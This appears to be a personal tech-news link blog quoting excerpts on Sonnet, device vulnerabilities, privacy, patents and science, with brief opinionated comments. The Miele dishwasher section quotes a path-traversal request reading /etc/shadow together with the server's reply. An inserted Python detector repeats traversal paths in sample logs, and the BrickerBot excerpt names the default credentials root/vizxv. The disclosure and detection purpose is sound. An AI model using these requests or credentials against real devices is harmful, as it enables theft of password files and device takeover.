Open sourcing Sonnet – a new library for constructing neural networks with Tensorflow

We have found that the flexibility and adaptiveness of TensorFlow lends itself to building higher level frameworks for specific purposes, and we’ve written one for quickly building neural network modules with TF. We are actively developing this codebase, but what we have so far fits our research needs well, and we’re excited to announce that today we are open sourcing it. We call this framework Sonnet.

Source: Open sourcing Sonnet – a new library for constructing neural networks | DeepMind

The main principle of Sonnet is to first construct Python objects which represent some part of a neural network, and then separately connect these objects into the TensorFlow computation graph. The objects are subclasses of sonnet.AbstractModule and as such are referred to as Modules.

Modules may be connected into the graph multiple times, and any variables declared in that module will be automatically shared on subsequent connection calls. Low level aspects of TensorFlow which control variable sharing, including specifying variable scope names, and using the reuse= flag, are abstracted away from the user.

Separating configuration and connection allows easy construction of higher-order Modules, i.e., modules that wrap other modules. For instance, the BatchApply module merges a number of leading dimensions of a tensor into a single dimension, connects a provided module, and then splits the leading dimension of the result to match the input. At construction time, the inner module is passed in as an argument to the BatchApply constructor. At run time, the module first performs a reshape operation on inputs, then applies the module passed into the constructor, and then inverts the reshape operation.

An additional advantage of representing Modules by Python objects is that it allows additional methods to be defined where necessary. An example of this is a module which, after construction, may be connected in a variety of ways while maintaining weight sharing. For instance, in the case of a generative model, we may want to sample from the model, or calculate the log probability of a given observation. Having both connections simultaneously requires weight sharing, and so these methods depend on the same variables. The variables are conceptually owned by the object, and are used by different methods of the module.
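To make the construct-then-connect pattern, the automatic variable sharing and the BatchApply reshape concrete, here is an added, standalone Python sketch; it is not Sonnet's or TensorFlow's code, the class names only mirror the description above, and nested lists stand in for tensors so it runs without TensorFlow.

```python
"""Standalone sketch of Sonnet's construct-then-connect pattern.

Added example, not Sonnet's own code: nested lists stand in for TF tensors
and plain lists stand in for TF variables, so it runs without TensorFlow.
"""
import random


def shape(t):
    """Shape of a nested-list tensor, e.g. [[1, 2], [3, 4]] -> (2, 2)."""
    dims = []
    while isinstance(t, list):
        dims.append(len(t))
        t = t[0]
    return tuple(dims)


class AbstractModule:
    """Configure in __init__, connect in __call__; variables are created on
    the first connection and shared by every later one (no reuse flag)."""

    def __init__(self):
        self._variables = {}  # variable name -> stand-in variable

    def get_variable(self, name, var_shape, init):
        if name not in self._variables:      # first connection: create
            self._variables[name] = init(var_shape)
        return self._variables[name]         # later connections: share

    def __call__(self, inputs):
        return self._build(inputs)

    def _build(self, inputs):
        raise NotImplementedError


def random_matrix(var_shape):
    rows, cols = var_shape
    return [[random.uniform(-0.1, 0.1) for _ in range(cols)] for _ in range(rows)]


class Linear(AbstractModule):
    """y = x @ W + b on a rank-2 input of shape [batch, input_size]."""

    def __init__(self, output_size):
        super().__init__()
        self.output_size = output_size

    def _build(self, inputs):
        _, input_size = shape(inputs)
        w = self.get_variable("w", (input_size, self.output_size), random_matrix)
        b = self.get_variable("b", (self.output_size,), lambda s: [0.0] * s[0])
        return [[sum(x[i] * w[i][j] for i in range(input_size)) + b[j]
                 for j in range(self.output_size)] for x in inputs]


class BatchApply(AbstractModule):
    """Merge n_dims leading dimensions, connect the inner module, split back."""

    def __init__(self, module, n_dims=2):
        super().__init__()
        self._module = module
        self._n_dims = n_dims

    def _build(self, inputs):
        leading = shape(inputs)[:self._n_dims]
        flat = inputs
        for _ in range(self._n_dims - 1):        # merge leading dims into one
            flat = [row for block in flat for row in block]
        out = self._module(flat)                 # inner sees [prod(leading), ...]
        for size in reversed(leading[1:]):       # invert the reshape
            out = [out[i:i + size] for i in range(0, len(out), size)]
        return out


def shares_variables(module, inputs):
    """True when connecting a module twice reuses the same variable objects
    (and therefore yields the same output)."""
    first = module(inputs)
    ids_before = {k: id(v) for k, v in module._variables.items()}
    second = module(inputs)
    ids_after = {k: id(v) for k, v in module._variables.items()}
    return ids_before == ids_after and first == second
```

Wrapping the same Linear instance in BatchApply and also connecting it directly keeps one set of weights, which is the property the generative-model example above relies on.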

Github repository

1046 – Broadcom: Heap overflow in TDLS Teardown Request while handling Fast Transition IE: your phone can be taken over using rogue wifi signals

Source: 1046 – Broadcom: Heap overflow in TDLS Teardown Request while handling Fast Transition IE – project-zero – Monorail

Comes with proof of concept code

“BrickerBot” tries to kill your poorly secured IoT things

The Bricker Bot PDoS attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim’s devices. Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but was able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.’

Corrupting a Device

Upon successful access to the device, the PDoS bot performed a series of Linux commands that would ultimately lead to corrupted storage, followed by commands to disrupt Internet connectivity, device performance, and the wiping of all files on the device.

Source: “BrickerBot” Results In Permanent Denial-of-Service | ERT Threat Alert

The commands it runs are really really nasty…

One security researcher, 40 holes in Samsung’s Tizen

A security researcher has found 40 unknown zero-day vulnerabilities in Tizen, the operating system that runs on millions of Samsung products.

Source: Samsung’s Android Replacement Is a Hacker’s Dream – Motherboard

Cisco Aironet 1830 Series and 1850 Series Access Points Mobility Express with hardcoded passwords

The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device.

Cisco advisory

What information Windows 10 Creators Update will slurp from your PC

Windows 10 Home and Pro has, right now, two levels of data collection, Basic and Full. When a computer is in Basic mode, Microsoft says Win 10 takes a note of the state of your hardware and its specifications, your internet connection quality, records of crashes and hangs by software, any compatibility problems, driver usage data, which apps you’ve installed and how you use them, and other bits and pieces.

In Full mode, shedloads more is sent over. It includes everything at the Basic level plus records of events generated by the operating system, and your “inking and typing data.” Engineers, with permission from Microsoft’s privacy governance team, can obtain users’ documents that trigger crashes in applications, so they can work out what’s going wrong. The techies can also run diagnostic tools remotely on the computers, again with permission from their overseers.

And next

In the Creators Update, aka Windows 10 version 1703, all this information will be collected in Basic mode. A lot of it is to help Microsofties pinpoint the cause of crashes and potential new malware infections, although it includes things like logs of you giving applications administrator privileges via the UAC, battery life readings, firmware version details, details of your hardware down to the color and serial number of the machine, which cell network you’re using, and so on.

Then there’s the information collected in Full mode, which includes everything in Basic plus your user settings and preferences, your browser choice, lists of your peripherals, the apps you use to edit and view images and videos, how long you use the mouse and keyboard, all the applications you’ve ever installed, URLs to videos you’ve watched that triggered an error, URLs to music that triggered an error, time spent reading ebooks, text typed in a Microsoft web browser’s address and search bar, URLs visited, visited webpage titles, the words you’ve spoken to Cortana or had translated to text by the system, your ink strokes, and more.

Source: Put down your coffee and admire the sheer amount of data Windows 10 Creators Update will slurp from your PC

This is just ridiculous!

Harry Shearer: Why My ‘Spinal Tap’ Lawsuit Affects All Creators

Last fall, Shearer filed a $125 million lawsuit against Vivendi – the company that owns This Is Spinal Tap – for financial misappropriation and launched a website called Fairness Rocks explaining his lawsuit. He alleged that the company says the four creators between them have only earned $81 in merchandizing income and $98 for their contributions to the movie’s soundtrack over a 22-year period.

Unfortunately, “Hollywood accounting” isn’t a practice confined to California. Within the success story that is the European film and television industry, which generated €122 billion in 2013, less than one-third of 1 percent [1] was shared with the writers and directors of the works created. A peculiar definition of “fairness,” you might say.

Under French law, filmmakers should be paid a fee for their work plus an ongoing remuneration proportionate to the exploitation of their creation. In reality, less than 3 percent of French writers and directors receive anything more than the initial payment of that minimum guarantee. [2] And 70 percent of all European film directors are asked to defer a proportion of their original fees (as we, the creators of This is Spinal Tap, originally agreed to do).

Source: Harry Shearer: Why My ‘Spinal Tap’ Lawsuit Affects All Creators

This happens to rock stars too 🙁 Good luck guys!

Iron Man IRL: Gravity and Red Bull unveil personal jetpack

British aeronautic engineering startup Gravity unveiled a new human flying suit today. It’s a six-engine jet-propelled personal flying apparatus that the company says will take regular humans to superhero heights at several hundred miles per hour.

Source: Iron Man IRL: Gravity and Red Bull unveil personal jetpack

Molecule kills elderly cells, reduces signs of aging in mice

Even if you aren’t elderly, your body is home to agents of senility—frail and damaged cells that age us and promote disease. Now, researchers have developed a molecule that selectively destroys these so-called senescent cells. The compound makes old mice act and appear more youthful, providing hope that it may do the same for us.

“It’s definitely a landmark advance in the field,” says cell and molecular biologist Francis Rodier of the University of Montreal in Canada who wasn’t connected to the study. “This is the first time that somebody has shown that you can get rid of senescent cells without having any obvious side effects.”

Source: Molecule kills elderly cells, reduces signs of aging in mice

About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals

A new attack on smart TVs allows a malicious actor to take over devices using rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals, get root access on the smart TV, and use the device for all sorts of nasty actions, ranging from DDoS attacks to spying on end users.

Scheel’s method, which he recently presented at a security conference, is different because the attacker can execute it from a remote location, without user interaction, and runs in the TV’s background processes, meaning users won’t notice when an attacker compromises their TVs.

The researcher told Bleeping Computer via email that he developed this technique without knowing about the CIA’s Weeping Angel toolkit, which makes his work even more impressive.

Furthermore, Scheel says that “about 90% of the TVs sold in the last years are potential victims of similar attacks,” highlighting a major flaw in the infrastructure surrounding smart TVs all over the globe.

At the center of Scheel’s attack is Hybrid Broadcast Broadband TV (HbbTV), an industry standard supported by most cable providers and smart TV makers that “harmonizes” classic broadcast, IPTV, and broadband delivery systems. TV transmission signal technologies like DVB-T, DVB-C, or IPTV all support HbbTV.

Scheel says that anyone can set up a custom DVB-T transmitter with equipment priced between $50-$150, and start broadcasting a DVB-T signal.

Source: About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals

Virtual lemonade sends colour and taste to a glass of water

Ranasinghe and his team used an RGB colour sensor and a pH sensor to capture the colour and acidity of a freshly poured glass of lemonade. This data was sent to a special tumbler in another location that was filled with water. An electrode around the rim of the tumbler mimicked the sourness of the lemonade by stimulating the drinker’s taste buds with a pulse of electricity. LED lights replicated the colour.

Source: Virtual lemonade sends colour and taste to a glass of water | New Scientist

Miele Professional PG 8528 dishwasher insecure – Web Server Directory Traversal

The corresponding embedded webserver “PST10 WebServer” typically listens
on port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aid in subsequent attacks.

Proof of Concept:
~$ telnet 80
Connected to
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52


We are not aware of an actual fix.
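As an added, defender-side illustration (not Miele's firmware or code from the advisory), the following Python shows the check an embedded web server should apply before opening a requested file, and a detector that applies the same check to constructed access-log lines; the document root, log lines and client addresses are all assumed values.

```python
"""Added example (not Miele's firmware or the advisory's code): two
defender-side checks for the directory-traversal pattern shown above.

safe_resolve() is the check an embedded web server should apply before
opening a file; find_traversal() runs it over constructed access-log lines.
"""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/htdocs"  # assumed document root; any absolute path works


def safe_resolve(request_path, root=WEB_ROOT):
    """Map a request path to a file under root, or None if it would escape.

    Percent-encoding is decoded twice to catch double encoding, backslashes
    are folded to slashes, and '..' is collapsed only *after* joining to the
    root: '/../../etc/shadow' then normalises to '/etc/shadow', which lies
    outside root and is rejected. Normalising the request path on its own
    first would clip the leading '..' and make it look harmless.
    """
    root = posixpath.normpath(root)
    decoded = unquote(unquote(request_path)).replace("\\", "/")
    if "\x00" in decoded:             # NUL byte: truncation tricks, reject
        return None
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


# Constructed access-log lines (common log format); not from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Nov/2016:11:58:50 +0000] "GET /../../../../../../../../../../../../etc/shadow HTTP/1.1" 200 52
10.0.0.7 - - [16/Nov/2016:12:01:03 +0000] "GET /index.html HTTP/1.1" 200 2048
10.0.0.9 - - [16/Nov/2016:12:02:17 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1201
10.0.0.9 - - [16/Nov/2016:12:02:18 +0000] "GET /images/..%5c..%5cboot.ini HTTP/1.1" 404 0
10.0.0.5 - - [16/Nov/2016:12:05:00 +0000] "GET /docs/a/../b.html HTTP/1.1" 200 512
"""

_REQUEST = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def find_traversal(log_text, root=WEB_ROOT):
    """Return (ip, path, status) for each request whose path would resolve
    outside root; a '..' that stays inside root is not flagged. A 200 on a
    flagged line means the server actually served the file."""
    hits = []
    for line in log_text.splitlines():
        m = _REQUEST.match(line)
        if m and safe_resolve(m["path"], root) is None:
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits
```

The last sample line shows why the detector resolves paths instead of grepping for "..": a relative hop that stays inside the document root is normal and should not page anyone.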

Full disclosure

Why would anyone want a webserver on their dishwasher?!

An Unexpected New Lung Function Has Been Found – They Make Blood

Researchers have discovered that the lungs play a far more complex role in mammalian bodies than we thought, with new evidence revealing that they don’t just facilitate respiration – they also play a key role in blood production.

In experiments involving mice, the team found that they produce more than 10 million platelets (tiny blood cells) per hour, equating to the majority of platelets in the animals’ circulation. This goes against the decades-long assumption that bone marrow produces all of our blood components.

Source: An Unexpected New Lung Function Has Been Found – They Make Blood

Intel Claims Optane Memory Will Speed Your Computer Up for Cheap

Intel’s new Optane memory is, according to Intel, an entirely new type of computer memory. It’s based on the 3D Xpoint memory architecture Intel announced back in July 2015. It’s as fast as the DRAM memory found in every computer used today, but as stable as the NAND memory found in the SSDs central to most of your pricier laptops.

And according to Intel, when it’s slotted into a computer alongside DRAM it speeds that computer up incredibly—giving you the kind of benefits traditionally only seen when you use a solid state drive. Intel claims computers power on twice as fast as they would without Optane, browsers launch five times faster, and games can launch up to 67 percent faster.

Intel Optane memory works as a kind of supercharger for a computer’s storage system. It doesn’t replace any components already in a computer. Instead it’s an add-on, clipped into the motherboard. In a computer’s processes Optane memory sits between the hard drive and the processor—remembering regularly accessed data, like RAM might, but retaining that information even when a program is closed or the computer is turned off.

Currently Optane memory will only be available for desktop computers with Kaby Lake processors and “Optane memory ready” motherboards (check the documentation for your motherboard to confirm).

For people who currently own a computer that’s Optane memory ready, it will fit into the M.2 slot on your motherboard—the same one currently used by the fastest solid state drives available, and as with DRAM memory, more is better. Optane memory will come in two sizes when it goes on sale April 24: 16GB ($44) and 32GB ($77).

Source: Intel Claims Its Magical New Memory Will Speed Your Computer Up for Cheap

Costco golf ball suit shows how threatening with unfounded patent accusations causes companies to die

Indeed, Costco might just be trying to beat Acushnet at a legal game that the ball maker has mastered—court sport. Acushnet has managed to muscle out other upstarts easily, simply by filing complaints.

Tiny manufacturers who can’t afford to litigate have been forced to fold based on Acushnet’s accusations alone, with no proof of infringement. For example, in 2015, Acushnet sued five small golf-ball makers. The co-founder of one of these companies, speaking on condition of anonymity because of the terms of the settlement, told Quartz that’s just how business is done.

Companies with deep pockets lock down the market by making it too expensive for competitors to operate and to offer lower-priced yet quality products. It is a legitimate tactic; even those who succumb to it don’t really begrudge the approach. The co-founder of the smaller competitor sued by Acushnet said he believes the company decides who to sue based on Golf Digest’s Hot List, which signals potential competitors, and that the company files claims regardless of actual infringement.

Source: A lawsuit over Costco golf balls shows why we can’t have nice things cheap

What a great system the patent and law system is!

Self flowing liquids

Imagine a liquid that could move on its own.

No need for human effort or the pull of gravity. You could put it in a container flat on a table, not touch it in any way, and it would still flow.

Brandeis researchers report in a new article in Science that they have taken the first step in creating a self-propelling liquid. The finding holds out the promise of developing an entirely new class of fluids that can flow without human or mechanical effort. One possible real-world application: Oil might be able to move through a pipeline without needing to be pumped.

Researchers recreate the system that causes cells to change shape. The result: a liquid that can move by itself.

Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules

The US House of Representatives has just approved a “congressional disapproval” vote of privacy rules, which gives your ISP the right to sell your internet history to the highest bidder.

The measure passed by 215 votes to 205.

This follows the same vote in the Senate last week. Just prior to the vote, a White House spokesman said the president supported the bill, meaning that the decision will soon become law.

This approval means that whoever you pay to provide you with internet access – Comcast, AT&T, Time Warner Cable, etc – will be able to sell everything they know about your use of the internet to third parties without requiring your approval and without even informing you.

Your ISP already knows quite a lot about you: your name and address, quite possibly your age, and a host of other personally identifiable information such as your social security number. That’s on the customer information side. On the service side, they know which websites you visit, when, and how often.

That information can be used to build a very detailed picture of who you are: what your political and sexual leanings are; whether you have kids; when you are at home; whether you have any medical conditions; and so on – a thousand different data points that, if they have sufficient value to companies willing to pay for them, will soon be traded without your knowledge.

Source: Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules

This is just incredible, even in Trumpland: rape and pillage the peons!

Set up a VPN!

A 3 billion solar mass black hole rockets out of a galaxy at 8 million kilometers per hour.

A black hole with three billion times the mass of the Sun has been found hurtling out of its parent galaxy at 8 million kilometers per hour! What could give it that kind of incredible boost? Turns out, it’s something even more incredible: the two supermassive black holes that merged to form it in the first place.

In astronomy, you deal with a lot of ridiculously violent cosmic phenomena. Stars explode, asteroids collide, whole galaxies smash together. When you look at the math and physics, when you actually grasp the levels of power involved, it’ll make the hair on the back of your neck stand up. It’s chaos wielded on a mind-crushing scale.

And then there’s the “two supermassive black holes colliding and merging and then launching the resulting even larger billion-solar-mass black hole out of a galaxy at nearly 8 million kilometers per hour due to gravitational waves” scale of immensity.

Source: A 3 billion solar mass black hole rockets out of a galaxy at 8 million kilometers per hour. Yes, seriously.

Google Open Sources guetzli jpeg encoder

Guetzli is a JPEG encoder that aims for excellent compression density at high visual quality. Guetzli-generated images are typically 20-30% smaller than images of equivalent quality generated by libjpeg. Guetzli generates only sequential (nonprogressive) JPEGs due to the faster decompression speeds they offer.

UK flight ban on electronic devices announced – copying Trumpist insanity

The UK government has announced a cabin baggage ban on laptops and tablets on direct flights to the UK from Turkey, Lebanon, Jordan, Egypt, Tunisia and Saudi Arabia.

The ban follows a similar move in the US, where officials say bombs could be hidden in a series of devices.

Downing Street said it was “necessary, effective and proportionate”.

The government has not given a start-date for the ban, but says airlines are “in the process of implementing it”.

The ban applies to any device larger than 16cm long, 9.3cm wide or 1.5cm deep. It includes smart phones, but most fall inside these limits.

Any affected device, including e-readers, will need to be placed into hold luggage.

Source: UK flight ban on electronic devices announced – BBC News

This looks like a bit of the government being “Seen to do Something(tm)” even if that something is incredibly useless and hinders passengers, like the ban on liquids. It also looks very much like the UK is in the pocket of the US, which looks worse now that it’s being run by wealth raping clowns.

Burglars can easily make Google Nest security cameras stop recording

The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends to the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter, respectively.

That’s easy to do as Bluetooth is never disabled after the initial setup of the cameras, and attackers (e.g. burglars) can usually come close enough to them to perform the attack.

Triggering one of these flaws will make the devices crash and reboot.

The third flaw is a bit more serious, as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to.

If that particular SSID does not exist, the camera drops its attempt to associate with it and returns to the original Wi-Fi network, but the whole process can last from 60 to 90 seconds, during which the camera won’t be recording.

Source: Burglars can easily make Google Nest security cameras stop recording – Help Net Security

A new definition would add 102 planets to our solar system — including Pluto

Pluto fans are attempting to reignite a contentious astronomy debate: What is a planet?

Is Pluto a planet?

It’s not a question scientists ask in polite company.

“It’s like religion and politics,” said Kirby Runyon, a planetary scientist at Johns Hopkins University. “People get worked up over it. I’ve gotten worked up over it.”

The issue can bring conversations to a screeching halt, or turn them into shouting matches. “Sometimes,” Runyon said, “it’s just easier not to bring it up.”

But Runyon will ignore his own advice this week when he attends the annual Lunar and Planetary Science Conference in Houston. In a giant exhibit hall crowded with his colleagues, he’s attempting to reignite the debate about Pluto’s status with an audacious new definition for planet — one that includes not just Pluto, but several of its neighbors, objects in the asteroid belt, and a number of moons. By his count, 102 new planets could be added to our solar system under the new criteria.

When the IAU voted in 2006, scientists came to the conclusion that gravitational dominance is what distinguishes the eight planets from the solar system’s other spheres. From giant Jupiter to tiny Mercury, each is massive enough to make them the bullies of their orbits, absorbing, ejecting or otherwise controlling the motion of every other object that gets too close. According to the definition, planets must also orbit the sun.

Pluto, which shares its zone of the solar system with a host of other objects, was reclassified as a “dwarf planet” — a body that resembles a planet but fails to “clear its neighborhood,” in the IAU’s parlance.

But to Runyon, that distinction is less important than what dozens of solar system worlds have in common: geology.

“I’m interested in an object’s intrinsic properties,” he said. “What it is on its surface and in its interior? Whether an object is in orbit around another planet or the sun doesn’t really matter for me.”

Runyon calls his a “geophysical” definition. A planet, he says, is anything massive enough that gravity pulls it into a sphere (a characteristic called “hydrostatic equilibrium”), but not so massive that it starts to undergo nuclear fusion and become a star.

If you talk to enough scientists on either side of this debate, you’ll notice that their arguments start to echo each other. They use the same terms to criticize the definitions they don’t like: “not useful,” “too emotional,” “confusing.” Both groups want the same thing: for the public to understand and embrace the science of the solar system. But each is convinced that only their definition can achieve that goal. And each accuses the other of confusing people by prolonging the debate.

Source: A new definition would add 102 planets to our solar system — including Pluto

Give us Pluto back!

Patents Are A Big Part Of Why We Can’t Own Nice Things: the Supreme Court Should Fix That

Today, the Supreme Court heard arguments in a case that could allow companies to keep a dead hand of control over their products, even after you buy them. The case, Impression Products v. Lexmark International, is on appeal from the Court of Appeals for the Federal Circuit, who last year affirmed its own precedent allowing patent holders to restrict how consumers can use the products they buy. That decision, and the precedent it relied on, departs from long established legal rules that safeguard consumers and enable innovation.

When you buy something physical—a toaster, a book, or a printer, for example—you expect to be free to use it as you see fit: to adapt it to suit your needs, fix it when it breaks, re-use it, lend it, sell it, or give it away when you’re done with it. Your freedom to do those things is a necessary aspect of your ownership of those objects. If you can’t do them, because the seller or manufacturer has imposed restrictions or limitations on your use of the product, then you don’t really own them. Traditionally, the law safeguards these freedoms by discouraging sellers from imposing certain conditions or restrictions on the sale of goods and property, and limiting the circumstances in which those restrictions may be imposed by contract.

Source: Patents Are A Big Part Of Why We Can’t Own Nice Things: the Supreme Court Should Fix That

Patent law out of control again

Bloke, 48, accused of whaling two US tech leviathans out of $100m

According to allegations in the indictment against Rimasauskas, which was unsealed this week, he had orchestrated his scheme between 2013 and 2015, targeting “a multinational technology company and a multinational online social media company” and tricking them into wiring funds to bank accounts under his control.

The bank accounts in question belonged to companies that Rimasauskas had himself set up and incorporated with the same name as an unspecified “Asian-based computer hardware manufacturer” with whom the victim companies were involved in legitimate business.

Rimasauskas’s phishing emails posed as if they represented the real hardware manufacturer, and requested that money which the victim companies owed to that manufacturer for legitimate goods and services be paid into the accounts of the company he’d set up himself.

Source: Bloke, 48, accused of whaling two US tech leviathans out of $100m

Russian mastermind of $500m bank-raiding Citadel coughs to crimes

Mark Vartanyan, who operated under the handle “Kolypto”, was arrested in Norway last year, and extradited to America in December. The 29-year-old was charged with one count of computer fraud. On Monday, he pleaded guilty [PDF] to a district court in Atlanta, US. He faces up to 10 years in the clink and a $250,000 fine – that’s slashed from a maximum of 25 years due to his guilty plea. He will be sentenced in June.

Citadel surfaced in 2011, infected Windows PCs, and silently slurped victims’ online banking credentials so their money could be siphoned into crooks’ pockets. It could also snoop on computer screens and hold files to ransom. It was a remarkable success. US prosecutors estimate that, at its height, the malware infected 11 million computers and was responsible for the theft of more than $500m from bank accounts.

Source: Russian mastermind of $500m bank-raiding Citadel coughs to crimes
